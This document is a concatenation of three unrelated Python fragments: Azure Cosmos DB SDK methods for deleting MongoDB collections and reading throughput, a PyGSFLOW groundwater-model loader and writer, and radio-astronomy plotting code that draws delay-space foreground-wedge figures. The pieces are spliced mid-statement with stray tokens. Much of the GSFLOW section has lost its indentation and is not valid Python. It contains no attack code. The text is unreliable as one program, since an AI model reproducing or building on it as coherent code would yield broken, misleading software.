        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
        'databaseName': self._serialize.url("database_name", database_name, 'str'),
        'collectionName': self._serialize.url("collection_name", collection_name, 'str'),
    }
    # polling=True -> standard ARM LRO polling; False -> return immediately;
    # otherwise use the caller-provided polling strategy object.
    if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output
        )
    else:
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_update_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'} # type: ignore
def _delete_mongo_db_collection_initial(
    self,
    resource_group_name, # type: str
    account_name, # type: str
    database_name, # type: str
    collection_name, # type: str
    **kwargs # type: Any
):
    # type: (...) -> None
    """Fire the DELETE request that kicks off removal of a MongoDB collection.

    202 (accepted, in progress) and 204 (already gone) are success; any
    other status is translated into a typed ARM error.
    """
    cls = kwargs.pop('cls', None) # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2021-03-15"
    # Fill the URL template attached to this method's metadata with
    # serialized, validated path parameters.
    template = self._delete_mongo_db_collection_initial.metadata['url'] # type: ignore
    ser = self._serialize
    path_args = {
        'subscriptionId': ser.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
        'resourceGroupName': ser.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'accountName': ser.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
        'databaseName': ser.url("database_name", database_name, 'str'),
        'collectionName': ser.url("collection_name", collection_name, 'str'),
    }
    url = self._client.format_url(template, **path_args)
    # DELETE carries no body; only the api-version query parameter is sent.
    query_parameters = {'api-version': ser.query("api_version", api_version, 'str')} # type: Dict[str, Any]
    header_parameters = {} # type: Dict[str, Any]
    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    if response.status_code not in (202, 204):
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)
    if cls:
        return cls(pipeline_response, None, {})
_delete_mongo_db_collection_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'} # type: ignore
def begin_delete_mongo_db_collection(
    self,
    resource_group_name, # type: str
    account_name, # type: str
    database_name, # type: str
    collection_name, # type: str
    **kwargs # type: Any
):
    # type: (...) -> LROPoller[None]
    """Deletes an existing Azure Cosmos DB MongoDB Collection.

    :param resource_group_name: The name of the resource group. The name is case insensitive.
    :type resource_group_name: str
    :param account_name: Cosmos DB database account name.
    :type account_name: str
    :param database_name: Cosmos DB database name.
    :type database_name: str
    :param collection_name: Cosmos DB collection name.
    :type collection_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    :return: An instance of LROPoller that returns either None or the result of cls(response)
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
    cls = kwargs.pop('cls', None) # type: ClsType[None]
    lro_delay = kwargs.pop(
        'polling_interval',
        self._config.polling_interval
    )
    cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
    # No continuation token means a fresh operation: issue the initial
    # DELETE. 'cls' is overridden so the raw pipeline response is handed
    # back for the poller to inspect.
    if cont_token is None:
        raw_result = self._delete_mongo_db_collection_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            database_name=database_name,
            collection_name=collection_name,
            cls=lambda x,y,z: x,
            **kwargs
        )
    # These kwargs were consumed by the initial call and must not leak into
    # the polling method below.
    kwargs.pop('error_map', None)
    kwargs.pop('content_type', None)
    def get_long_running_output(pipeline_response):
        # DELETE has no result body; only invoke the custom callback.
        if cls:
            return cls(pipeline_response, None, {})
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
        'databaseName': self._serialize.url("database_name", database_name, 'str'),
        'collectionName': self._serialize.url("collection_name", collection_name, 'str'),
    }
    # polling=True -> standard ARM LRO polling; False -> return immediately;
    # otherwise use the caller-provided polling strategy object.
    if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output
        )
    else:
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'} # type: ignore
def get_mongo_db_collection_throughput(
    self,
    resource_group_name, # type: str
    account_name, # type: str
    database_name, # type: str
    collection_name, # type: str
    **kwargs # type: Any
):
    # type: (...) -> "_models.ThroughputSettingsGetResults"
    """Gets the RUs per second of the MongoDB collection under an existing Azure Cosmos DB database
    account with the provided name.

    :param resource_group_name: The name of the resource group. The name is case insensitive.
    :type resource_group_name: str
    :param account_name: Cosmos DB database account name.
    :type account_name: str
    :param database_name: Cosmos DB database name.
    :type database_name: str
    :param collection_name: Cosmos DB collection name.
    :type collection_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: ThroughputSettingsGetResults, or the result of cls(response)
    :rtype: ~azure.mgmt.cosmosdb.models.ThroughputSettingsGetResults
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None) # type: ClsType["_models.ThroughputSettingsGetResults"]
    # Map auth / not-found / conflict statuses to typed exceptions; callers
    # may extend or override the mapping via the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2021-03-15"
    accept = "application/json"
    # Construct URL: fill the template stored on this method's metadata with
    # serialized (and length/pattern validated) path parameters.
    url = self.get_mongo_db_collection_throughput.metadata['url'] # type: ignore
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
        'databaseName': self._serialize.url("database_name", database_name, 'str'),
        'collectionName': self._serialize.url("collection_name", collection_name, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {} # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
    # Construct headers
    header_parameters = {} # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    # Only 200 is expected for a synchronous GET; anything else is an error.
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)
    deserialized = self._deserialize('ThroughputSettingsGetResults', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get_mongo_db_collection_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}/throughputSettings/default'} # type: ignore
<gh_stars>0
# -*- coding: utf-8 -*-
import os, sys
import logging
from .control import Control
from .prms import Prms
from .supports import _get_file_abs
from .prms_help import Helper
import flopy
import subprocess as sp
if sys.version_info > (3, 0):
import queue as Queue
else:
import Queue
from datetime import datetime
import threading
def load(control_file):
    """Load a GSFLOW model from *control_file* and return the Gsflow object.

    :param control_file: path to the GSFLOW control file
    :return: loaded :class:`Gsflow` instance

    Note: ``Gsflow.__init__`` already calls ``self.load()``, so no explicit
    ``load()`` call is made here — the previous version called it a second
    time and re-parsed every input file.
    """
    return Gsflow(control_file=control_file)
class Gsflow():
def __init__(self, control_file=None, prms=None, mf=None, mf_load_only=None,
             prms_load_only=None, gsflow_exe=None):
    """Build a GSFLOW model wrapper and immediately load it from disk.

    :param control_file: path to the GSFLOW control file (required in practice;
        it is resolved to an absolute path and parsed by ``load()``)
    :param prms: optional pre-built :class:`Prms` model; anything that is not
        a ``Prms`` instance is ignored and rebuilt by ``load()``
    :param mf: optional pre-built ``flopy.modflow.Modflow`` model; likewise
        ignored unless it is the right type
    :param mf_load_only: passed through as an attribute (load filter)
    :param prms_load_only: passed through as an attribute (load filter)
    :param gsflow_exe: path to the gsflow executable; defaults to the copy
        bundled with the package
    """
    print("PyGSFLOW ------ V0.0")
    self.Help = Helper()
    self.control_file = os.path.abspath(control_file)
    self.ws = None
    self.mf_load_only = mf_load_only
    self.prms_load_only = prms_load_only
    # Bug fix: previously a caller-supplied executable path was silently
    # dropped (self.gsflow_exe was only assigned in the default branch),
    # and the default used a hard-coded Windows separator.
    if gsflow_exe is None:
        gsflow_exe = os.path.join(os.path.dirname(__file__), "bin", "gsflow.exe")
    self.gsflow_exe = gsflow_exe
    # Keep caller-supplied models only when they are of the expected type;
    # otherwise load() below rebuilds them from the control file.
    self.prms = prms if isinstance(prms, Prms) else None
    self.mf = mf if isinstance(mf, flopy.modflow.Modflow) else None
    self.load()
def load(self):
    """Parse the control file, then load the PRMS model and, when the run
    mode requires it, the MODFLOW model.

    :raises ValueError: if ``self.control_file`` does not exist on disk.
    """
    # load control file
    if not (os.path.isfile(self.control_file)):
        raise ValueError("Cannot find control file")
    self.control = Control(control_file=self.control_file)
    print("Control file is loaded")
    # load prms
    print("Working on loading PRMS model ...")
    self.prms = Prms(control=self.control)
    # load modflow
    mode = self.control.get_values('model_mode')
    # MODFLOW files exist only for coupled (GSFLOW) or MODFLOW-only runs.
    if 'GSFLOW' in mode[0] or 'MODFLOW' in mode[0]:
        print ("Working on loading MODFLOW files ....")
        fname = self.control.get_values('modflow_name')
        # 'modflow_name' is stored relative to the control file; resolve it
        # to an absolute path before loading.
        fname = _get_file_abs(control_file=self.control_file, fn=fname[0])
        self._load_modflow(fname)
        self.mf.namefile = os.path.basename(self.control.get_values('modflow_name')[0])
    else:
        print ("There are no Modflow files, PRMS model only")
def _load_modflow(self, fname):
    """
    The package files in the .nam file are relative to the executable
    gsflow, so generate a temporary name file whose package entries are
    plain basenames and load that with flopy from the model directory.

    :param fname: absolute path to the MODFLOW name (.nam) file
    :return: None; sets ``self.mf``
    """
    # Use context managers so the handles are closed even on error
    # (the original left both files open if parsing raised).
    with open(fname, 'r') as fidr:
        content = fidr.readlines()
    temp_fn = os.path.basename(fname).split('.')[0] + "_gsflow_temp_.nam"
    mf_dir = os.path.dirname(fname)
    temp_fn = os.path.join(mf_dir, temp_fn)
    with open(temp_fn, 'w') as fidw:
        for line in content:
            line = line.strip()
            # Skip blank lines (previously 'line[0]' raised IndexError on
            # an empty line) and comment lines.
            if not line or line[0] == '#':
                continue
            parts = line.split()
            pkg_nm = parts[0]
            pkg_un = parts[1]
            pkg_fn = os.path.basename(parts[2])
            fidw.write("{} {} {}\n".format(pkg_nm, pkg_un, pkg_fn))
    self.mf = flopy.modflow.Modflow.load(temp_fn, model_ws=mf_dir)
    print("MODFLOW files are loaded ... ")
# def change_ws(self, ws):
#
# if os.path.isdir(ws):
# print("Warning: The {} directory already exists".format(ws))
# parent_folder = os.path.dirname(ws)
#
# if not (os.path.isdir(parent_folder)):
# raise ValueError(" The parent directory {} doesn't exist...".format(parent_folder))
#
# if not (os.path.isdir(ws)):
# os.mkdir(ws)
#
# self.ws = ws
#
# # change control file location
# fnn = os.path.basename(self.control.control_file)
# self.control.control_file = os.path.join(self.ws, fnn)
#
# # change parameters
# for par_record in self.prms.Parameters.parameters_list:
# curr_file = os.path.basename(par_record.file_name)
# curr_file = os.path.join(self.ws, curr_file)
# par_record.file_name = curr_file
#
# # change datafile
# curr_file = os.path.basename(self.prms.Data.data_file)
# curr_file = os.path.join(self.ws, curr_file)
# self.prms.Data.data_file = curr_file
#
# # change mf
# if not (self.mf == None):
# self.mf.change_model_ws(self.ws)
# def change_base_file_name(self, filename):
# # change control file location
# cnt_file = filename + "_cnt" + ".control"
# dir__ = os.path.dirname(self.control.control_file)
# self.control.control_file = os.path.join(dir__, cnt_file)
#
# # change parameters
# for index, par_record in enumerate(self.prms.Parameters.parameters_list):
# curr_file = os.path.basename(par_record.file_name)
# curr_file = os.path.join(self.ws, curr_file)
# par_record.file_name = curr_file
#
# # change datafile
# curr_file = os.path.basename(self.prms.Data.data_file)
# curr_file = os.path.join(self.ws, curr_file)
# self.prms.Data.data_file = curr_file
# pass
def _get_relative_path(self, fn):
    """
    If relative files are used, they should be relative to the control file.

    :param fn: file path to express relative to the control file
    :return: relative path of ``fn`` with respect to the control file's
        directory

    Bug fixes: ``os.path.absfile`` does not exist (``abspath`` is meant);
    the final join concatenated directory and basename with ``+`` instead
    of passing two arguments, producing a malformed path; and the Control
    object (``self.control``) was passed where the control-file path is
    needed.
    """
    control_file_abs = os.path.abspath(self.control_file)
    fn_abs = os.path.abspath(fn)
    # find common path
    rel_dir = os.path.relpath(os.path.dirname(fn_abs), os.path.dirname(control_file_abs))
    return os.path.join(rel_dir, os.path.basename(fn))
# def _mk_dir(self, dir_):
# if not (os.path.isdir(dir_)):
# os.mkdir(dir_)
# else:
# print(" Warning: the directory exists {}".format(dir_))
def write_input(self, basename=None, workspace=None):
"""
:param basename:
:param workspace:
:return:
Write input files for gsflow. Four cases are possible:
(1) if basename and workspace are None,then the exisiting files will be overwritten
(2) if basename is specified, only file names will be changes
(3) if only workspace is specified, only folder will be changed
(4) when both basename and workspace are specifed both files are changed
"""
# overwrite
print("Writing the project files .....")
if not (workspace == None):
workspace = os.path.abspath(workspace)
if basename == None and workspace == None:
print("Warning: input files will be overwritten....")
self._write_all()
return
# only change the directory
if (basename == None) and (not (workspace == None)):
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
fnn = os.path.basename(self.control.control_file)
self.control.control_file = os.path.join(workspace, fnn)
self.control_file = os.path.join(workspace, fnn)
self.prms.control_file = self.control_file
# change parameters
new_param_file_list = []
for par_record in self.prms.parameters.parameters_list:
curr_file = os.path.basename(par_record.file_name)
curr_file = os.path.join(workspace, curr_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
curr_file = os.path.basename(self.prms.Data.data_file[0])
curr_file = os.path.join(workspace, curr_file)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
self.mf.change_model_ws(workspace)
nmfile = os.path.basename(self.mf.name)
self.mf.name = os.path.join(self.mf.model_ws, nmfile)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = nmfile + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = self.mf.name + ".nam"
self.control.set_values('modflow_name', [mfnm])
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
cnt_dir = os.path.dirname(self.control_file)
va = os.path.join(workspace, os.path.basename(fil))
file_value.append(va)
self.control.set_values(rec_name, file_value)
# write
self.prms.control = self.control
self._write_all()
return
# only change the basename
if (not (basename == None)) and (workspace == None):
cnt_file = basename + "_cont.control"
ws_ = os.path.dirname(self.control.control_file)
self.control.control_file = os.path.join(ws_, cnt_file)
self.control_file = os.path.join(ws_, cnt_file)
self.prms.control_file = self.control_file
# change parameters
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(self.prms.parameters.parameters_list):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_dir = os.path.dirname(par_record.file_name)
curr_file = os.path.join(curr_dir, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_dir = os.path.dirname(self.prms.Data.data_file)
curr_file = os.path.join(curr_dir, dfile)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
curr_dir = self.mf.model_ws
#self.mf.name = os.path.join(curr_dir, basename)
self.mf.name = os.path.join(curr_dir, basename)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = basename + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = self.mf.name + ".nam"
self.control.set_values('modflow_name',[mfnm])
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
if rec_name in ['modflow_name', 'param_file', 'data_file']:
continue
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
dir_name = os.path.dirname(fil)
if rec_name == 'modflow_name':
mfname = basename + ".nam"
filvalue = os.path.join(dir_name, mfname)
else:
vvfile = rec_name.split("_")
del vvfile[-1]
vvfile = "_".join(vvfile)
if "." in fil:
ext = fil.split(".")[-1]
else:
ext = "dat"
#ext = fil.split(".")[-1]
vvfile = basename + "_" + vvfile + "." + ext
filvalue = os.path.join(dir_name, vvfile)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
self.prms.control = self.control
self._write_all()
return
# change both directory & basename
if (not (basename == None)) and (not (workspace == None)):
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
cnt_file = basename + "_cont.control"
self.control.control_file = os.path.join(workspace, cnt_file)
self.prms.control_file = self.control.control_file
self.control_file = self.control.control_file
# change parameters
## get param files list
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(self.prms.parameters.parameters_list):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_file = os.path.join(workspace, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_file = os.path.join(workspace, dfile)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
self.mf.change_model_ws(workspace)
self.mf.name = os.path.join(workspace, basename)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = basename + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = basename + ".nam"
self.control.set_values('modflow_name', [os.path.join(workspace, mfnm)])
## TODO: Update control file
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
if rec_name in ['modflow_name', 'param_file', 'data_file']:
continue
file_values = self.control.get_values(rec_name)
file_value = []
| |
fontsize=12)
cbax.xaxis.set_label_position('top')
# PLT.tight_layout()
fig.subplots_adjust(right=0.72)
fig.subplots_adjust(top=0.88)
PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/'+telescope_str+'multi_baseline_screening_CLEAN_noiseless_PS_'+ground_plane_str+snapshot_type_str+obs_mode+'_gaussian_FG_model_asm'+sky_sector_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6,nchan*freq_resolution/1e6)+bpass_shape+'{0:.1f}'.format(oversampling_factor)+'.png', bbox_inches=0)
PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/'+telescope_str+'multi_baseline_screening_CLEAN_noiseless_PS_'+ground_plane_str+snapshot_type_str+obs_mode+'_gaussian_FG_model_asm'+sky_sector_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6,nchan*freq_resolution/1e6)+bpass_shape+'{0:.1f}'.format(oversampling_factor)+'.eps', bbox_inches=0)
##################################################################
if plot_15:
    # 15) Plot Fourier space
    # Schematic of the (baseline length |b|, delay tau) plane: horizon lines
    # at tau = +/- |b|/c, the shaded foreground wedge between them, the
    # delay-grating limits at +/- 1/coarse_channel_resolution, and the
    # EoR-sensitive regions in between.  Delays are shown in microseconds
    # (hence the 1e6 factors); the twin axes relabel the plane in
    # cosmological k_parallel / k_perp units via kprll()/kperp().
    bw = nchan * freq_resolution
    fig = PLT.figure(figsize=(6,6))
    ax = fig.add_subplot(111)
    # ax.plot(truncated_ref_bl_length, 1e6*min_delay.ravel(), 'k-', truncated_ref_bl_length, 1e6*max_delay.ravel(), 'k-')
    # ax.plot(truncated_ref_bl_length, 1e6*(min_delay.ravel()-1/bw), 'k--', truncated_ref_bl_length, 1e6*(max_delay.ravel()+1/bw), 'k--')
    # Solid lines: positive/negative horizon delays tau = +/- |b|/c.
    ph_line, nh_line = ax.plot(truncated_ref_bl_length, 1e6*truncated_ref_bl_length/FCNST.c, 'k-', truncated_ref_bl_length, -1e6*truncated_ref_bl_length/FCNST.c, 'k-')
    # Dashed lines: horizon plus the 1/bandwidth delay buffer.
    ax.plot(truncated_ref_bl_length, -1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), 'k--', truncated_ref_bl_length, 1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), 'k--')
    # Dash-dot lines: delay-grating delays set by the coarse channel width,
    # drawn only where they lie outside the horizon (|b| <= c/coarse_channel_resolution).
    ax.plot(truncated_ref_bl_length[truncated_ref_bl_length <= FCNST.c/coarse_channel_resolution], 1e6/coarse_channel_resolution*NP.ones(NP.sum(truncated_ref_bl_length <= FCNST.c/coarse_channel_resolution)), 'k-.')
    ax.plot(truncated_ref_bl_length[truncated_ref_bl_length <= FCNST.c/coarse_channel_resolution], -1e6/coarse_channel_resolution*NP.ones(NP.sum(truncated_ref_bl_length <= FCNST.c/coarse_channel_resolution)), 'k-.')
    # Shaded regions: light grey outside the buffered horizon, slightly
    # darker inside the grating band, darkest for the foreground wedge itself.
    ax.fill_between(truncated_ref_bl_length, -0.5/freq_resolution*1e6, -1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), facecolor='0.8', edgecolor='none')
    ax.fill_between(truncated_ref_bl_length, 1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), 0.5/freq_resolution*1e6, facecolor='0.8', edgecolor='none')
    ax.fill_between(truncated_ref_bl_length, -1e6/coarse_channel_resolution, -1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), facecolor='0.7', edgecolor='none')
    ax.fill_between(truncated_ref_bl_length, 1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), 1e6/coarse_channel_resolution, facecolor='0.7', edgecolor='none')
    ax.fill_between(truncated_ref_bl_length, -1e6*truncated_ref_bl_length/FCNST.c, 1e6*truncated_ref_bl_length/FCNST.c, facecolor='0.5', edgecolor='none')
    ax.set_xlim(truncated_ref_bl_length.min(), truncated_ref_bl_length.max())
    ax.set_ylim(-1.25, 1.25)
    # Region annotations.
    ax.text(0.5, 0.5, 'Foregrounds', transform=ax.transAxes, fontsize=12, weight='semibold', ha='left', color='black')
    ax.text(100, 1e6/coarse_channel_resolution, 'Delay grating', fontsize=12, weight='semibold', ha='left', color='black', va='bottom')
    ax.text(100, -1e6/coarse_channel_resolution, 'Delay grating', fontsize=12, weight='semibold', ha='left', color='black', va='top')
    ax.text(10, 0.45, 'Maximal EoR \nsensitivity', fontsize=12, weight='semibold', ha='left', va='center')
    ax.text(10, -0.45, 'Maximal EoR \nsensitivity', fontsize=12, weight='semibold', ha='left', va='center')
    # 'Horizon' labels rotated to follow the horizon lines: convert the line
    # endpoints to display coordinates and compute each line's screen angle.
    anchor_bll = 125.0
    anchor_nh_delay = -1e6 * anchor_bll/FCNST.c
    anchor_ph_delay = 1e6 * anchor_bll/FCNST.c
    nhp1 = ax.transData.transform_point(NP.array([nh_line.get_xdata()[0], nh_line.get_ydata()[0]]))
    nhp2 = ax.transData.transform_point(NP.array([nh_line.get_xdata()[-1], nh_line.get_ydata()[-1]]))
    nh_angle = NP.degrees(NP.arctan2(nhp2[1]-nhp1[1], nhp2[0]-nhp1[0]))
    php1 = ax.transData.transform_point(NP.array([ph_line.get_xdata()[0], ph_line.get_ydata()[0]]))
    php2 = ax.transData.transform_point(NP.array([ph_line.get_xdata()[-1], ph_line.get_ydata()[-1]]))
    ph_angle = NP.degrees(NP.arctan2(php2[1]-php1[1], php2[0]-php1[0]))
    nh_text = ax.text(anchor_bll, anchor_nh_delay, 'Horizon', fontsize=12, weight='semibold', rotation=nh_angle, ha='left')
    ph_text = ax.text(anchor_bll, anchor_ph_delay, 'Horizon', fontsize=12, weight='semibold', rotation=ph_angle, ha='left')
    # ax.set_ylim(-0.5/freq_resolution*1e6, 0.5/freq_resolution*1e6)
    ax.set_ylabel(r'$\tau$ [$\mu$s]', fontsize=16, weight='medium')
    ax.set_xlabel(r'$|\mathbf{b}|$ [m]', fontsize=16, weight='medium')
    # Right-hand axis: delay relabelled as k_parallel.  The extra empty
    # set_yticks([]) call clears inherited ticks before placing new ones.
    axr = ax.twinx()
    axr.set_yticks([])
    axr.set_yticks(kprll(ax.get_yticks()*1e-6, redshift))
    axr.set_ylim(kprll(NP.asarray(ax.get_ylim())*1e-6, redshift))
    axr.set_ylabel(r'$k_\parallel$ [$h$ Mpc$^{-1}$]', fontsize=16, weight='medium')
    yformatter = FuncFormatter(lambda y, pos: '{0:.2f}'.format(y))
    axr.yaxis.set_major_formatter(yformatter)
    # Top axis: baseline length relabelled as k_perp.
    axt = ax.twiny()
    axt.set_xticks([])
    axt.set_xticks(kperp(ax.get_xticks()*freq/FCNST.c, redshift))
    axt.set_xlim(kperp(NP.asarray(ax.get_xlim())*freq/FCNST.c, redshift))
    axt.set_xlabel(r'$k_\perp$ [$h$ Mpc$^{-1}$]', fontsize=16, weight='medium')
    xformatter = FuncFormatter(lambda x, pos: '{0:.3f}'.format(x))
    axt.xaxis.set_major_formatter(xformatter)
    PLT.tight_layout()
    # Save both raster and vector versions.
    PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/fourier_space_{0:.1f}_MHz_{1:.1f}_MHz.png'.format(freq/1e6,nchan*freq_resolution/1e6))
    PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/fourier_space_{0:.1f}_MHz_{1:.1f}_MHz.eps'.format(freq/1e6,nchan*freq_resolution/1e6))
##################################################################
if plot_17 or plot_18 or plot_19:
delta_array_usm_infile = '/data3/t_nithyanandan/'+project_dir+'/delta_array_multi_baseline_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_usm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb'
